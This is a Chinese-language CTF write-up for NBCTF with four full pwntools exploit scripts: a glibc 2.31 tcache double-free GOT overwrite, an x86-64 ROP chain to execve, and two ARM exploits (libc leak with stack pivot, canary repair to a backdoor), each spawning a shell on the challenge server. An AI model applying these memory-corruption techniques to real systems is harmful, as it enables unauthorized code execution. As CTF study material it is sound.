day2打了一个叫NBCTF的比赛
做了四个题，剩下五道arm的题不会做了，关注一下wp，也许可以靠这个比赛提升一波异架构能力。
heapnotes
glibc 2.31 简单堆题，没啥好说的：tcache double free（edit 把 fd 和 key 字段一起清掉，绕过 2.31 的 double free 检测），把 chunk 分配到 GOT 上直接改 got 就行了。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
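#context.log_level = 'debug'
context.arch = 'amd64'
# Live target; swap in one of the commented lines to debug locally.
io = remote('chal.nbctf.com', 30172)
#io = process('./pwn')
#io = process(['./pwn'], env={'LD_PRELOAD': './libc64.so'})
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

# pwntools I/O shorthands (author's template).
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# lg('name') eval()s the name it is handed. Acceptable only because every
# argument is a literal written in this script - never pass external data.
lg = lambda s: log.info('\033[1;31;40m %s -- 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))


# Menu wrappers. Prompt strings were reconstructed from a garbled paste;
# confirm them against the binary's actual output before reuse.
def menu(choice):
    """Select menu entry `choice` (1 add, 2 show, 3 edit, 4 free)."""
    sla(b'> ', str(choice))


def add(context):
    """Add a note whose body is `context` (the name shadows pwntools' `context`
    inside this function only; it is just the note data)."""
    menu(1)
    sla(b'Input note data: ', context)


def show(index):
    """Print note `index` (also works on freed notes - the UAF read)."""
    menu(2)
    sla(b'): ', str(index))


def edit(index, context):
    """Overwrite note `index` with `context` (also works on freed notes - the UAF write)."""
    menu(3)
    sla(b'): ', str(index))
    sla(b'Input note data: ', context)


def free(index):
    """Free note `index` (no pointer clearing, hence the UAF)."""
    menu(4)
    sla(b'): ', str(index))


add(b'/bin/sh\x00')   # note 0
add(b'a' * 8)         # note 1
add(b'/bin/sh\x00')   # note 2 - the string system() will get later
free(0)
free(1)               # tcache bin now: 1 -> 0
# UAF read: note 1's tcache fd is chunk 0's user pointer. On glibc 2.31 the
# first chunk follows the 0x290-byte tcache_perthread_struct, hence -0x2a0.
show(1)
heapbase = uu64(rl()) - 0x2a0
lg('heapbase')
# Clobber both fd and the tcache `key` field of the freed note 1 so glibc
# 2.31's double-free check (e->key == tcache) no longer fires, then free it
# again: the bin becomes a loop 1 -> 1.
edit(1, b'a' * 0x10)
free(1)
# 1st add returns chunk 1 and plants the target address as its fd,
# 2nd add returns chunk 1 again, 3rd add returns the target itself.
# 0x404020 is the GOT slot being hijacked - presumably the libc function that
# show() calls; confirm with `objdump -R pwn`.
add(p64(0x404020))
add(b'a' * 8)
add(p64(elf.plt['system']))   # GOT slot := system@plt
show(2)                       # hijacked call runs system("/bin/sh") on note 2
#gdb.attach(io)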
irt()

ribbit
直接写rop硬拿shell就好（先 read 把 "/bin/sh" 读到 bss，再 execve），不用管它什么所谓的win函数，反正程序是静态编译的，什么gadget都有。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
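#context.log_level = 'debug'
context.arch = 'amd64'
io = remote('chal.nbctf.com', 30170)
#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x401922')
#io = process(['./pwn'], env={'LD_PRELOAD': './libc64.so'})
elf = ELF('./pwn')
# Statically linked binary: no libc object needed, every gadget is in ./pwn.

# pwntools I/O shorthands (author's template).
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# lg('name') eval()s the name it is handed - only ever pass a literal name.
lg = lambda s: log.info('\033[1;31;40m %s -- 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# Fixed addresses (non-PIE static binary). Gadget semantics follow the
# author's naming (rdi_ret == `pop rdi; ret`, ...); re-check with ROPgadget
# if the binary differs.
rdi_ret = 0x000000000040201f
rsi_ret = 0x000000000040a04e
rdx_ret = 0x000000000047fe1a
rax_ret = 0x0000000000449267
win = 0x401825            # intended backdoor - not needed with a full ROP chain
puts = 0x40c7b0
t_read = 0x448800         # read()
bss = 0x4C6800            # writable scratch area for "/bin/sh"
syscall = 0x0000000000401dd4   # syscall; ret

# Chain: read(0, bss, 8) to drop "/bin/sh\0" into .bss, then
# execve(bss, 0, 0) through syscall 59. 0x28 bytes reach the saved rip.
payload = b'a' * 0x28
payload += p64(rdi_ret) + p64(0)
payload += p64(rsi_ret) + p64(bss)
payload += p64(rdx_ret) + p64(8)
payload += p64(t_read)                 # read(0, bss, 8)
payload += p64(rdi_ret) + p64(bss)
payload += p64(rsi_ret) + p64(0)
payload += p64(rdx_ret) + p64(0)
payload += p64(rax_ret) + p64(59)      # SYS_execve
payload += p64(syscall)                # execve("/bin/sh", NULL, NULL)
# Alternative kept from the original: return into win() with its magic value.
#payload = b'You got this!\x00' * 8 + b'Just do it!\x00' * 8 + p64(rdi_ret) + p64(0xF10C70B33F) + p64(rax_ret) + p64(rsi_ret) + p64(win)
# NOTE: sendline appends '\n'. If the vulnerable read is exactly sized, that
# newline would be consumed by the ROP read() below and corrupt the path -
# it worked against the challenge, but use send() + manual padding if in doubt.
sla(b'Can you give my pet frog some motivation to jump out the hole?', payload)
io.send(b'/bin/sh\x00')   # exactly the 8 bytes read() asks for, NUL-terminated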
irt()

ret2thumb
用自己的qemu-arm就可以直接怼shellcode，用它给的就不行，有点奇怪，而且没太懂这个题和thumb有什么关系。直接泄露libc然后栈迁移到bss上直接rop就行，不过要事先找到能控制r0的gadget。直接ROPgadget搜只能搜到控制fp、r3和r4的gadget，但是仔细找的话会发现，如果把0x10500地址处的 mov r0,r3; pop {fp,pc}（脚本里用的是0x10550）和 pop {r3,pc} 结合起来的话，是可以做到直接控制r0的，这也是为什么可以直接泄露libc去进行rop的原因。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
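#context.log_level = 'debug'
context.arch = 'arm'
io = remote('chal.nbctf.com', 30175)
#io = process(['./qemu-arm', '-g', 4321, '-L', '.', './pwn'])   # -g: wait for gdb on :4321
#io = process(['./qemu-arm', '-L', '.', './pwn'])
#print('please start gdb')
# Pause so a debugger can be attached to qemu before any input is sent
# (replaces the Python-2-only raw_input() of the original).
pause()
libc = ELF('./libc.so.6')
elf = ELF('./pwn')

# pwntools I/O shorthands (author's template).
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# lg('name') eval()s the name it is handed - only ever pass a literal name.
lg = lambda s: log.info('\033[1;31;40m %s -- 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

bss = 0x12600       # writable area the frame is pivoted into
gadget = 0x104F0    # re-enters the puts/read code with fp already pointing into .bss (per the write-up; verify in the disassembly)
r3_pc = 0x00010388  # pop {r3, pc}
r0_r3 = 0x10550     # mov r0, r3; pop {fp, pc}  (write-up text says 0x10500 - the script's 0x10550 is what worked)

# Stage 1: leak puts@libc and pivot. Frame: 0x20-byte buffer, saved fp, saved lr.
payload = b'a' * 0x20
payload += p32(bss)               # saved fp
payload += p32(r3_pc)             # saved lr -> pop {r3, pc}
payload += p32(elf.got['puts'])   #   r3 = &puts@got
payload += p32(r0_r3)             #   pc -> mov r0, r3; pop {fp, pc}
payload += p32(bss + 0x24)        #   fp = bss + 0x24: the next read lands at bss
payload += p32(gadget)            #   pc -> puts(r0), then read stage 2 into the pivoted frame
payload += p32(0)                 # trailing words the re-entered code pops; found empirically
payload += p32(bss)
sla(b'Can you ret2thumb? \n', payload)
# puts() prints the 4-byte GOT entry plus '\n'. Caveat: an address byte of
# 0x0a would truncate recvline(); re-run or switch to rn() if the leak looks short.
libcbase = uu64(rl()) - libc.sym['puts']
lg('libcbase')
system = libcbase + libc.sym['system']
#shellcode = asm(shellcraft.thumb.sh())   # works under a local qemu-arm, not the provided one

# Stage 2 is read to `bss`: 0x24 bytes, then the chain. Offsets: 0x24 + 5*4 = 0x38,
# so "/bin/sh" sits at bss + 0x38.
payload = b'a' * 0x24
payload += p32(r3_pc)         # pop {r3, pc}
payload += p32(bss + 0x38)    #   r3 = &"/bin/sh"
payload += p32(r0_r3)         #   pc -> mov r0, r3; pop {fp, pc}
payload += p32(bss)           #   fp (don't care)
payload += p32(system)        #   pc -> system("/bin/sh")
payload += b'/bin/sh\x00'
io.sendline(payload)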
irt()

canary-in-a-coal-mine
程序给了gets，还给了一个在栈上写入"从已知地址出发的某条指针链上任意一个数据"的功能。有canary，也给了后门，所以直接用大量后门地址覆盖栈（ARM 的 Thumb 函数地址要加 1），然后利用给的功能在bss找一个能指向canary的地址，把真正的canary写回对应位置，绕过canary保护就可以了。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
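context.log_level = 'debug'
context.arch = 'arm'
io = remote('chal.nbctf.com', 30178)
#io = process(['./qemu-arm', '-g', 4321, '-L', '.', './pwn'])   # -g: wait for gdb on :4321
#io = process(['./qemu-arm', '-L', '.', './pwn'])
#print('please start gdb')
# Pause so a debugger can be attached to qemu before any input is sent
# (replaces the Python-2-only raw_input() of the original).
pause()
libc = ELF('./libc.so.6')   # loaded but unused: the backdoor makes a libc leak unnecessary
elf = ELF('./pwn')

# pwntools I/O shorthands (author's template).
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
# lg('name') eval()s the name it is handed - only ever pass a literal name.
lg = lambda s: log.info('\033[1;31;40m %s -- 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

win = 0x10828   # backdoor function


# Menu wrappers. Prompt strings were reconstructed from a garbled paste;
# confirm them against the binary's actual output before reuse.
def menu(choice):
    """Select menu entry `choice`."""
    sla(b'> ', str(choice))


def mine(index, depth):
    """Option 1: start a pointer walk at address `index`, `depth` levels deep
    (semantics per the write-up; not verified here)."""
    menu(1)
    sla(b'mining position\n> ', str(index))
    sla(b'mining depth\n> ', str(depth))


def extract(index):
    """Option 2: write element `index` of the mined chain onto the stack
    (semantics per the write-up; not verified here)."""
    menu(2)
    sla(b'minecart number\n> ', str(index))


def gets(payload):
    """Option 3: the unbounded gets() read - the stack overflow."""
    menu(3)
    sla(b'collapsing mineshaft\n> ', payload)


# Spray win's address over the whole frame so every saved slot - canary and
# return address included - becomes win. Bit 0 is set so the return switches
# the core to Thumb state; win is presumably Thumb code (challenge family
# name), if it were ARM code the +1 would be wrong.
payload = p32(win + 1) * 0x20
gets(payload)
# The canary slot is now clobbered, so a plain return would abort. Repair it
# with the mine/extract feature: walk the pointer chain rooted at 0x21038
# (in .bss, presumably reaching the stack) two levels deep, then write chain
# element 8 back over the canary slot. Both numbers were found by inspection;
# re-derive them with gdb if the binary differs.
guard = 0x21038
mine(guard, 2)
extract(8)
menu(4)   # leave the menu: the function returns into win
irt()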